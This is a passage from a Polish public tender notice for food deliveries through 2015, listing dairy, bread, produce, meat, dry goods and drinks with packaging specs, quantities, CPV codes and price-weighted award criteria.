Mleko	Karton pojemność 1l, 3,2% tłuszczu	l	900
Parmezan	Opakowanie ok. 200g klin, ser twardy 	kg	4
Ser camembert 	Opakowanie 100 - 200g, krążki pakowane w papier lub folię, smak naturalny + 2 inne smaki 	kg	95
Ser edamski 40% - 45% tłuszczu	Blok w opakowaniu barierowym (folia), 	kg	70
Ser gouda 40% - 45% tłuszczu	Blok w opakowaniu barierowym (folia), 	kg	70
Ser królewski 45% tłuszczu	Blok w opakowaniu barierowym (folia), 	kg	70
Ser marmurkowy lub z przyprawami	Blok w opakowaniu barierowym (folia)	kg	20
Ser morski 45% tłuszczu	Blok w opakowaniu barierowym (folia)	kg	70
Ser mozzarella lub równoważny	Opakowanie 100 - 200g, krążki w zalewie	kg	120
Ser mini mozzarella	Opakowanie 100 - 300g, Kulki w zalewie	kg	15
Ser pleśniowy	Pleśń niebieska wewnątrz sera, opakowanie 100 - 200g, klin	kg	55
Ser salami 40 - 45% tłuszczu 	Blok w opakowaniu barierowym (folia)	kg	35
Ser sokół 45% tłuszczu	Blok w opakowaniu barierowym (folia)	kg	70
Ser topiony kiełbaski	Opakowanie barierowe (folia) ser o smaku śmietankowym, 	szt	20
Ser typu feta 	Opakowanie karton ok. 270g, sałatkowo - kanapkowy	szt	185
Ser wędzony 	Blok w opakowaniu barierowym (folia)	kg	90
Serek wiejski	Kubek pojemność 500g	szt	75
Śmietana  30% tłuszczu	Karton pojemność 500ml	kg	7
Śmietana do zup i sosów 18% tłuszczu	Karton pojemność 500ml	l	125
Śmietana kwaśna 18% tłuszczu	Kubek pojemność 400ml	l	210
Śmietanka do kawy 12% tłuszczu	Karton pojemność 500ml, 	l	185
Twaróg krajanka półtłusta	Opakowanie VACUM lub MAP, 	kg	460
Masło klarowane	Zawartość tłuszczu minimum 99%, opakowanie 500 - 1000g	kg	7
Serek homogenizowany	Różne smaki, opakowanie 100 - 200g	kg	19
Deser mleczny z mleka, orzechów i czekolady	Opakowanie od 50 - 100g	kg	35
Serek dla dzieci	Różne smaki, opakowanie od 50 - 100g	kg	10
Mleko smakowe	Różne smaki, opakowanie karton, pojemność 200 - 300ml	l	25
Jogurt do picia 	Różne smaki, opakowanie butelka pet, pojemność 200 - 300ml	l	45
Serek topiony trójkąt	Różne smaki, opakowanie zbiorcze karton, opakowanie porcji folia aliminiowa, waga porcji 10-30g, opk po 8szt	opk	18
Ser Brie	Opakowanie 100 - 200g, trójkąt pakowane w papier lub folię, smak naturalny	kg	7
Serek twarogowy porcjowy	Opakowanie plastik, waga porcji 10-30g, różne smaki	szt	375
Margaryna porcja	Opakowanie plastik, waga porcji 10-20g, 	szt	750
Masło porcja	Opakowanie plastik, waga porcji 10-20g, 	szt	1850
Serek mascarpone 	Opakowanie plastik, 	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwość dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pieczywa świeżego i ciast.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bagietka	długość ok. 50cm, 	szt	90
Bułka graham	waga min.35g	szt	1900
Bułka maślana	waga min.35g	szt	600
Bułka pszenna kaiserka lub mała poznańska	waga min.35g	szt	5900
Bułka tarta	opakowanie 0,5kg - 1kg	kg	90
Bułka wieloziarnista	waga min. 35g	szt	2500
Chleb baltonowski	waga min. 500g, krojony, pakowany w folie	szt	1100
Chleb razowy	waga min. 400g, krojony, pakowany w folie 	szt	450
Chleb razowy z dynią lub równoważny	waga min. 400g, krojony, pakowany w folie 	szt	8
Chleb razowy ze słonecznikiem lub równoważny	waga min. 400g, krojony, pakowany w folie 	szt	100
Chleb wiejski lub równoważny	waga min. 1000g	szt	40
Chleb wieloziarnisty lub równoważny	waga min. 400g, krojony, pakowany w folie 	szt	200
Chleb ze słonecznikiem lub równoważny	waga min. 400g, krojony, pakowany w folie 	szt	190
Chleb żytni z dynią lub równoważny	waga min. 400g, krojony, pakowany w folie 	szt	190
Pączki	z dżemem	szt	55
Sernik na kruchym cieście		kg	100
Sernik wiedeński		kg	100
Szarlotka		kg	150
W-Z 	Krem jasny, podkłady czekoladowe	kg	30
W-Z z galaretką i owocami	Podkład jasny, krem, owoce, galaretka	kg	25
Drożdżówka 100g	z budyniem, z twarogiem, z kruszonką	szt	100
Chleb weselny	waga około 1000g	szt	4
Tort weselny	Różne smaki, 	kg	15
Tort 	Różne smaki, na różne okazje 	kg	15
Chleb do żuru	Okrągły, 	szt	40
Makowiec	rolada 	kg	15
Mazurek	kruche ciasto+dekoracja	kg	8
Rolada czekoladowa	Biszkopt czekoladowy lub biały, kremy w różnych smakach	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.84.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas świeży	szt	25
Arbuz	kg	95
Bakłażan	kg	4
Banan	kg	130
Brokuły świeże	szt	15
Buraczki	kg	160
Cebula	kg	500
Cebula czerwona	kg	90
Cykoria	szt	4
Cytryna	kg	225
Czereśnie	kg	15
Czosnek świeży	kg	25
Fasolka szparagowa żółta	kg	15
Fenkuł (koper włoski)	szt	4
Gruszka	kg	135
Jabłka	kg	790
Jarmuż	szt	4
Kalafior świeży	szt	30
Kapusta biała	kg	110
Kapusta czerwona	kg	150
Kapusta kiszona wiaderka 3 - 5kg	kg	180
Kapusta młoda	szt	60
Kapusta pekińska	kg	215
Kapusta włoska	kg	30
Kiwi	szt	1600
Koper	szt	375
Limonka	kg	7
Mandarynka	kg	110
Marchew świeża	kg	545
Melon świeży	szt	20
Nektarynka	szt	455
Ogórek	kg	390
Ogórek gruntowy	kg	15
Ogórek kiszony wiaderka 3 - 5kg	kg	125
Papryka peperoni świeża 	kg	1
Papryka świeża (mix)	kg	230
Pieczarki świeże	kg	75
Pietruszka dekoracyjna	szt	20
Pietruszka korzeń	kg	180
Pietruszka nać	szt	380
Pomidor	kg	1100
Pomidory koktajlowe czerwone (500g)	opk	33
Pomidory koktajlowe pomarańczowe (500g)	opk	33
Por	szt	125
Por 	kg	85
Sałata	szt	270
Sałata dekoracyjna	szt	95
Sałata lodowa	szt	340
Seler naciowy	szt	4
Seler świeży	kg	240
Szczypior	szt	400
Truskawka	kg	45
Truskawka	opk	15
Winogron czerwony	kg	60
Winogron biały	kg	80
Ziemniaki młode	kg	1800
Ziemniaki stare	kg	3200
Mix sałat z roszponką	opk	50
Mix sałat z rukolą	opk	50
Rukola 	opk	45
Roszponka 	opk	20
Kiełki - różne 	opk	60
Rzodkiewka	szt	60
Pomarańcza	kg	4
Zioła świeże - różne	szt	4
Brzoskwinia	szt	330.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwość dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mięsa, drobiu i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron	Wędlina z mięsa wieprzowego, wędzona - parzona, opakowanie VACUM lub MAP, termin ważności min 21 dni, min 70% mięsa	kg	90
Biała kiełbasa 	Wędlina z mięsa wieprzowego, kiełbasa parzona opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	140
Boczek świeży lub mrożony 	Bez skóry, termin ważności min 5dni(świeży), min 6 miesięcy (mrożony) 	kg	80
Boczek wędzony	Bez skóry, wędzony - parzony, termin ważności min 21 dni	kg	170
Pierś z indyka wędzona	Wędlina z piersi indyka opakowanie VACUM lub MAP, termin ważności min 21 dni, min 70% mięsa	kg	50
Flaki wołowe 	Obgotowane, krojone, opakowanie VACUM lub MAP, 	kg	3
Golonka	Termin ważności min 5dni	kg	60
Golonka z kurczaka (wędlina)	Wędlina z mięsa drobiowego w galaretce, osłona barierowa (folia), termin ważności min 21 dni	kg	4
Kabanosy	Wędlina wieprzowa, wędzona - podsuszana, opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	10
Karkówka bk świeża lub mrożona	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony) 	kg	425
Kaszanka cienka	Produkt podrobowy z dodatkiem kaszy jęczmiennej w osłonce naturalnej, opakowanie VACUM lub MAP, termin ważności min 15 dni	kg	35
Kiełbasa jałowcowa	Wędlina z mięsa wieprzowego, wędzona - podsuszana, opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	25
Kiełbasa krakowska drobiowa	Wędlina z mięsa drobiowego , wędzona - parzona, w osłonce barierowej, termin ważności min 21dni	kg	30
Kiełbasa krakowska sucha	Wędlina z mięsa wieprzowego i wołowego, wędzona - podsuszana, w osłonce barierowej, termin ważności min 21 dni, min 80% mięsa, 	kg	30
Kiełbasa myśliwska	Wędlina z mięsa wieprzowego, wędzona - podsuszana, opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	20
Kiełbasa śląska	Wędlina z mięsa wieprzowego, wędzona - parzona, opakowanie VACUM lub MAP, termin ważności min 21 dni, min 75% mięsa	kg	250
Kindziuk	Wędlina wieprzowa, wędzona - dojrzewająca, opakowanie barierowe, termin ważności minimum 21 dni	kg	4
Korpusy drobiowe świeże lub mrożone	Termin ważności min 3dni (świeży), min 6 miesięcy (mrożony)	kg	240
Kurczak świeży lub mrożony	Termin ważności min 3dni (świeży), min 6 miesięcy (mrożony)	kg	30
Kurczak wędzony lub elementy	Tusza, wędzona, termin ważności min 10 dni, jeżeli elementy to w wycenie należy uwzględnić 1. pierś wędzoną, 2. udo lub pałki wędzone	kg	5
Łopatka bk świeża lub mrożona	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	280
Ogonówka	Wędlina z mięsa wieprzowego, opakowanie VACUM lub MAP, termin ważności 21 dni	kg	35
Pałki z kurczaka świeże lub mrożone	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	125
Parówki cienkie cielaczki	Wędlina wieprzowa, osłonka kolagenowa, opakowanie VACUM lub MAP, termin ważności 21 dni	kg	90
Pasztet drobiowy pieczony	Pasztet z mięsa drobiowego, termin ważności min 21 dni	kg	2
Pasztet wieprzowy pieczony	Pasztet z mięsa wieprzowego,  termin ważności min 21 dni	kg	2
Pierś z indyka świeża lub mrożona	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	210
Pierś z kurczaka świeża lub mrożona 	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony) 	kg	320
Polędwica łososiowa	Wędlina wieprzowa, wędzona na zimno, opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	25
Polędwica sopocka	Wędlina z mięsa wieprzowego, wędzona - parzona, opakowanie VACUM lub MAP, termin ważności 21 dni, min 70% mięsa	kg	85
Polędwica wołowa świeże lub mrożone	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	4
Polędwiczki wieprzowe świeże lub mrożone	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	55
Rostbef wołowy świeże lub mrożone 	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	4
Salami w posypce	Wędlina z mięsa wieprzowego, wędzone - dojrzewające, osłona barierowa (folia), termin ważności 21 dni	kg	20
Salceson ozorowy	Wędlina podrobowa,  termin ważnosći min 18 dni	kg	10
Salceson włoski	Wędlina podrobowa, termin ważnosći min 18 dni	kg	16
Schab bk	Termin ważności min 5dni	kg	560
Schab z wędzarni lub równoważny	Wędlina wieprzowa, wędzona - parzona, w ciemnej otoczce, termin ważności min 21dni	kg	35
Skrzydełka z kurczaka świeże lub mrożone 	Termin ważności min 3dni (świeży), min 6 miesięcy (mrożony)	kg	35
Słonina świeża lub mrożona 	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony, bez skóry	kg	25
Szynka bk cała świeża lub mrożona	Termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	50
Szynka z komina lub równoważna	Wędlina wieprzowa, wędzona - parzona, w ciemnej otoczce, termin ważności min 21dni	kg	45
Szynka długo dojrzewająca 	Wędlina wieprzowa, wędzona - dojrzewająca, opakowanie VACUM lub MAP  termin ważności minimum 21 dni	kg	10
Szynka konserwowa	Wędlina z mięsa wieprzowego, osłona barierowa (folia), termin ważności min 21 dni, 	kg	40
Szynka kulka świeża	Termin ważności min 5dni	kg	170
Szynka łososiowa	Wędlina wieprzowa, wędzona na zimno, opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	10
Szynka tradycyjna lub równoważna	Wędlina wieprzowa, wędzona - parzona, termin ważności min 21dni	kg	40
Szynka wiejska lub równoważna	Wędlina wieprzowa, wędzona - parzona, termin ważności min 21dni	kg	85
Udko z kurczaka świeże lub mrożone	Termin ważności min 3dni (świeży), min 6 miesięcy (mrożony)	kg	28
Wątróbka z kurczaka świeża lub mrożona	Termin ważności min 3dni (świeży), min 6 miesięcy (mrożony)	kg	14
Wołowina ekstra świeża lub mrożona	Udziec wołowy, termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	45
Żeberka świeże lub mrożone	Bez boczku, paski, termin ważności min 5dni (świeży), min 6 miesięcy (mrożony)	kg	33
Szynka z beczki lub równoważna	Wędlina wieprzowa, wędzona - parzona, termin ważności min 21dni	kg	4
Kiełbaski koktajlowe lub równoważne	Wędlina z mięsa wieprzowego, wędzona - parzona, opakowanie VACUM lub MAP, termin ważności min 21 dni, min 75% mięsa	kg	150
Parówki z szynki	Wędlina wieprzowa, osłonka barierowa folia, opakowanie VACUM lub MAP, termin ważności 21 dni	kg	90
Wędzonka krotoszyńska	Wędlina wieprzowa, wędzona na zimno, opakowanie VACUM lub MAP, termin ważności min 21 dni	kg	20
Rolada z boczku lub równoważna	Wędlina wieprzowa, wędzona - parzona, termin ważności min 21dni	kg	15
Fantazja drobiowa	Wędlina drobiowa z warzywami w galarecie	kg	45
Pieczeń rzymska	Wędlina wieprzowa, termin ważności min 21dni	kg	18
Smalec	Opakowanie 200g -1000g, folia lub papier, termin ważności minimum 14dni	kg	15
Ozory wieprzowe	Termin ważności min 3dni	kg	4
Szynka wieprzowa z kością	Termin ważności minimum 5dni	kg	10
Ligawa świeża lub mrożona	Termin ważności minimum 5dni (świeży), min 6 miesięcy (mrożony)	kg	4
Prosię faszerowane	Produkt gotowy, faszerowany kaszą, upieczony	kg	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6, 15.11.30.00-3, 15.11.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwość dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa produktów suchych i konserwowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas konserwowy	Puszka pojemność 550 - 600g, plastry w lekkim syropie	szt	35
Barszcz biały w proszku	Opakowanie  pojemność 1000g, typu Prymat lub Kamis lub równoważny	kg	6
Bazylia	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Buraczki konserwowe tarte	Słoik pojemność  400 - 1000g (masa po odcieku)	kg	125
Chrzan tarty	Słoik pojemność  150 - 850g	kg	50
Ciastka kruche	Maślane 	kg	30
	Z cukrem	kg	30
	Z nadzieniem	kg	30
	W czekoladzie	kg	30
Cukier	Opakowanie 1000g	kg	450
Cukier porcja	Saszetki  	szt	7000
Cukier puder	Opakowanie 400 - 1000g 	kg	13
Cukier waniliowy	Opakowanie 500 - 1000g	kg	10
Cynamon	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny 	kg	1
Czekolada gorzka	Tabliczka ok. 100g min 50% kakao	szt	6
Drożdże	świeże, kostki 100g	kg	1
Drożdże suszone	Opakowanie 8 - 10g	szt	110
Dżem	Wiaderko, pojemność 200 - 500g	kg	75
Fasola czerwona konserwowa 	Puszka pojemność 400 - 450g, 	szt	140
Fasola sucha jaś	Opakowanie 400 - 1000g 	kg	15
Gałka muszkatałowa	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Groszek zielony konserwowy 	Puszka pojemność 400 - 450g, 	szt	138
Groch łuskany połówki	Opakowanie 400 - 1000g 	kg	14
Groszek ptysiowy	opakowanie 500 - 2000g, do zup 	kg	4
Grzanki	Opakowanie  500 - 2000g, do zup małe	kg	2
Grzyby suszone	Opakowanie 500g, torba foliowa, borowik lub podgrzybek lub rydz	kg	6
Herbata czarna*	Saszetki w kształcie prostokąta lub trapezu, z zawieszką na sznurku, każda w oddzielnej kopercie, opakowanie kartonowe po 100szt, typu Lipton lub Irving lub równoważna	szt	11000
Herbata zielona*	Saszetki w kształcie prostokąta lub trapezu, z zawieszką na sznurku, każda w oddzielnej kopercie, opakowanie kartonowe po 20 - 30szt, typu Lipton lub Irving lub równoważna	szt	4000
Herbata czarna owocowa*	Saszetki w kształcie prostokąta lub trapezu, z zawieszką na sznurku, każda w oddzielnej kopercie, opakowanie kartonowe po 20 - 30szt, różne smaki minimum 6, typu Lipton lub Irving lub równoważna	szt	4000
Herbata Earl Grey*	Saszetki w kształcie prostokąta lub trapezu, z zawieszką na sznurku, każda w oddzielnej kopercie, opakowanie kartonowe po 20 - 30szt, typu Lipton lub Irving lub równoważna	szt	500
Kakao	Opakownie 250 - 500g	kg	4
Kakao instant 	Opakowanie PET, pojemność 300 - 500g	kg	4
Kapary w zalewie	Słoik  100 - 200g (masa po odcieku)	kg	6
Kasza gryczana	Opakowanie 1000g	kg	48
Kasza jęczmienna	Opakowanie 1000g	kg	50
Kawa	Kawa drobno mielona, opakowanie 500g, średniopalona, do ekspresów przelewowych, arabica min 80%, typu MK Cafe lub Jacobs lub równoważna	kg	130
Ketchup	Pojemniki plastykowe 500 - 1000g	kg	86
Koncentrat pomidorowy	30%,  pojemność 800 - 1000g	kg	86
Kukurydza konserwowa 	Puszka pojemność 400 - 450g, 	szt	180
Kwasek cytrynowy	Opakowanie 500 - 1000g	kg	1
Liść laurowy	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Majeranek	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	4
Majonez dekoracyjny 	Słoik pojemność  400 - 1000g, typu Winiary lub Hellmanns lub równoważny	kg	220
Makaron canelloni	Opakowanie 0,25 - 1 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron gwiazdki	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron lasagne	Opakowanie 0,25 - 1 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron łazanki lub kokardki	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron muszelki małe lub muszle duże	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron nitki 	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron spaghetti	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron świderki	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Makaron tagliatella	Opakowanie 0,25 - 3 kg, pszenica durum, typu Lubella lub Barilla lub równoważny 	kg	10
Mąka pszenna tortowa 	Opakowanie 1kg, typ 450 -500	kg	500
Mąka ziemniaczana	Opakowanie 500 - 1000g	kg	20
Migdały	Opakowanie 100 - 1000g	kg	2
Miód	Słoik pojemność  500 - 1000g	kg	30
Morele suszone	Opakowanie 500 - 1000g	kg	15
Musztarda	Opakowanie PET 500 - 1000g	kg	80
Musztarda francuska	Opakowanie 250 - 1000g	kg	7
Ocet	Butelka pojemność 500ml	l	45
Ocet balsamiczny	Butelka pojemność 200 - 1000ml	l	1
Ocet winny	Butelka pojemność 200 - 1000ml	l	9
Ogórek konserwowy	Słoik pojemność  900g	szt	240
Olej	Pojemność 1000 - 3000ml	l	528
Oliwa z oliwek	Butelka szkło 1l, extra virgine, 	l	11
Oliwki	Słoik 500 - 1000g (masa po odcieku)	kg	25
Oregana	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Orzechy włoskie	Opakowanie 500 - 1000g	kg	4
Owoce kandyzowane	Opakowanie 100 - 500g	kg	1
Paluszki solone 	Opakowanie 50 - 150g	szt	10
Papryka chilli w proszku	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Papryka konserwowa ćwiartki	Słoik pojemność  900g	szt	155
Papryka ostra	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Papryka peperoni konserwowa	Słoik 500 - 1000g	szt	40
Papryka słodka	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	4
Pieczarki marynowane	Słoik pojemność  900g	szt	135
Pieprz biały mielony	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Pieprz cytrynowy	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Pieprz czarny mielony	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	7
Pieprz marynowany	Opakowanie 500 - 700g, 	kg	1
Pieprz młotkowy	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Płatki śniadaniowe czekoladowe 	Opakowanie 1000g	kg	10
Płatki śniadaniowe kukurydziane	Opakowanie 1000g	kg	10
Płatki śniadaniowe miodowe 	Opakowanie 1000g	kg	10
Pomidory w zalewie	Opakowanie 2000 - 3000g	kg	19
Powidła śliwkowe	Opakowanie 250 - 500g	kg	1
Proszek do pieczenia	Opakowanie 8 - 16g	szt	90
Przyprawa do flaków	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Przyprawa do grilla	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	2
Przyprawa do gyros	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Przyprawa do kurczaka	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	2
Przyprawa do pierników	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Przyprawa do ziemniaków	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	2
Przyprawa typu wegeta	Opakowanie 1000g, typu Prymat lub Kamis lub równoważny	kg	20
Przyprawa w płynie 	Butelka 1000 - 1500ml, typu Prymat lub Kamis lub równoważny	l	30
Rodzynki	Opakowanie 500 - 1000g	kg	7
Rosół w proszku	Opakowanie 1000g, typu Prymat lub Kamis lub równoważny	kg	15
Rozmaryn	Opakowanie PET duże,  typu Prymat lub Kamis lub równoważny	kg	1
Ryż długoziarnisty	Opakowanie 1000g	kg	30
Ryż parabolit	Opakowanie 1000 - 3000g	kg	30
Soczewica	opakowanie 500g czerwona	kg	4
Sos sałatkowy włoski	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	7
Sól	Opakowanie 1000g	kg	135
Sól morska gruba	Opakowanie 500 - 1000g	kg	1
Szczaw konserwowy	Słoik ok. 250 - 350g	szt	30
Szparagi konserwowe zielone	Słoik 200 - 500g	kg	55
Śliwki suszone	Opakowanie 500 - 1000g	kg	20
Tłuszcz do pieca konwekcyjno parowego	Butelka 3,7l	l	15
Tuńczyk w sosie własnym	Puszki 150g -200g	szt	100
Tymianek	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Ziele angielskie	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	3
Zupa kurkowa w proszku	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Żelatyna	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	2
Żurawina cała do mięs	opakowanie słoik 200 - 350g	kg	6
Żurek w proszku	Opakowanie 1000g, typu Prymat lub Kamis lub równoważny	kg	10
Sos balsamico	Opakowanie butelka, pojemność 250 - 500ml	l	3
Wafelek w polewie czekoladowej	masa 30 - 50g	szt	180
Kasza manna	Opakowanie 500 - 1000g	kg	4
Pomidory suszone w oleju	Opakowanie 300 - 500g 	kg	25
Cebula perłowa 	Opakowanie słoik 300 - 500g	kg	40
Kukurydza mini kolby marynowana	Opakowanie słoik 300 - 500g	kg	45
Koncentrat barszczu czerwonego	Opakowanie butelka szklana 500 - 1000ml	l	4
Szparagi konserwowe białe	Opakowanie 200 - 500g	kg	55
Słodzik w tabletkach	Opakowania plastykowe z dozownikiem	szt	1
Słonecznik łuskany	Opakowanie 100 - 500g	kg	1
Pestki dyni łuskane	Opakowanie 100 - 500g	kg	1
Orzechy laskowe	Opakowanie 100 - 500g	kg	1
Orzeski ziemne smażone solone	Opakowaie puszka pojemność 100 - 200g	szt	4
Krakersy 	Opakowanie 150 - 200g	szt	4
Mąka żytnia 	Opakowanie 800 - 1000g	kg	4
Soda oczyszczona	Opakowanie 80 - 100g	szt	15
Budyń 	Różne smaki, słodzony, opakowanie 50 - 70g	szt	7
Kisiel	Różne smaki, słodzony, opakowanie 60 - 80g	szt	15
Galaretka owocowa	Różne smaki,  opakowanie 70 - 80g	szt	50
Tortilla pszenna	o25cm, opakowanie 12szt, waga 800 - 900g	kg	18
Masa makowa z bakaliami	Opakowanie 700 - 1000g	kg	4
Sezam biały	Opakowanie 100 - 500g	kg	1
Kawa rozpuszczalna 	W saszetkach, 16 - 20g	szt	60
Brzoskwinie konserwowe	Puszka 700 - 900g	szt	25
Kasza kuskus	Opakowanie 400 - 1000g 	kg	15
Curry	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Imbir mielony	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Kminek cały	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Owoc jałowca	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Estragon	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Goździk	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Pieprz ziarno kolorowy lub czrny	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Czosnek granulowany	Opakowanie PET duże, typu Prymat lub Kamis lub równoważny	kg	1
Makaron sojowy	Opakowanie folia, 500-1000g	kg	3
Papier ryżowy	Opakowanie folia, 150-500g, Omin 15cm	szt	3
Sos sojowy	Opakowanie butelka szklana 500 - 1000ml	l	3
Kiełki fasoli mun lub soi konserwowe	opakowanie puszka 200-500g	szt	3
Pędy bambusa konserwowe	opakowanie puszka 200-500g	szt	3
sos chilli	opakowanie butelka plastykowa 200-500ml	l	1
grzyby mun	opakowanie folia 200-500g	kg	1
Nutella porcja	Opakowanie 20-50g, plastik	szt	375
Kawa ziarno	Opakowanie 1kg, 100%arabica, typu MK Cafe lub Jacobs lub równoważna	kg	40
Dżem porcja	opakowanie 10-30g, plastik	szt	750
Miód porcja	opakowanie 10-30g, plastik	szt	750.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.40.00-1, 15.84.23.00-5, 15.30.00.00-1, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Częstotliwośc dostaw - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa napojów, soków i wody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineralna**	Butelka ok. 18,9l	l	1200
Typu Dar Natury lub Jantar			
lub równoważana			
Soki owocowe 100% 	Karton 1l z nalewakiem, pomarańczowy bez dodatku cukru	l	500
Typu Tymbark lub Hortex lub	Karton 1l z nalewakiem, nektar czarna porzeczka bez dodatku cukru	l	300
równoważany	Karton 1l z nalewakiem, jabłko bez dodatku cukru	l	470
	Karton 1l z nalewakiem, czerwony grejpfrut bez dodatku cukru	l	180
	Karton 1l z nalewakiem, biały grejpfrut bez dodatku cukru	l	180
	Karton 1l z nalewakiem, pomidorowy bez dodatku cukru	l	10
	Karton 1l z nalewakiem, ananas bez dodatku cukru	l	10
